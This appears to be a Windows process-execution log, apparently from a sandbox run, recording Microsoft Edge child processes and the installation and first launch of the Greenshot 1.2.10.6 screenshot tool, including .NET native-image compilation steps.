"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3864 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2020 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1740,2460168577395196869,5417546639643773096,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6700 /prefetch:8

C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe

"C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe"

C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp" /SL5="$180258,1293027,131584,C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe"

C:\Users\Admin\AppData\Local\Temp\is-RCUTO.tmp\_isetup\_setup64.tmp

helper 105 0x48C

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files\Greenshot\Greenshot.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess 1dc -Pipe 1e8 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1dc -InterruptEvent 0 -NGENProcess 204 -Pipe 1ec -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 2a0 -Pipe 2a8 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 2f4 -Pipe 2f8 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 204 -Pipe 2b4 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 1dc -Pipe 2e8 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 0 -NGENProcess 1e4 -Pipe 2ac -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2fc -InterruptEvent 0 -NGENProcess 1e4 -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 0 -NGENProcess 2e0 -Pipe 300 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 0 -NGENProcess 2f4 -Pipe 2a4 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Program Files\Greenshot\GreenshotPlugin.dll"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess 1dc -Pipe 1e8 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 0 -NGENProcess 1ec -Pipe 290 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 28c -Pipe 27c -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 28c -Pipe 2a0 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 2ac -Pipe 294 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 278 -InterruptEvent 0 -NGENProcess 29c -Pipe 1dc -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 0 -NGENProcess 2b4 -Pipe 2b8 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 288 -Pipe 28c -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 2ac -Pipe 29c -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 1ec -Pipe 2a8 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 278 -Pipe 284 -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 2c4 -Pipe 29c -Comment "NGen Worker Process"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 2d0 -Pipe 2a4 -Comment "NGen Worker Process"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://getgreenshot.org/thank-you/?language=en&version=1.2.10.6

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa741d3cb8,0x7ffa741d3cc8,0x7ffa741d3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1860 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1

C:\Program Files\Greenshot\Greenshot.exe

"C:\Program Files\Greenshot\Greenshot.exe" /language en

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,7499645959545272157,11855202910463826490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:8

C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\greenshotocrcommand.exe

"C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\greenshotocrcommand.exe" -c

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffa741d3cb8,0x7ffa741d3cc8,0x7ffa741d3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

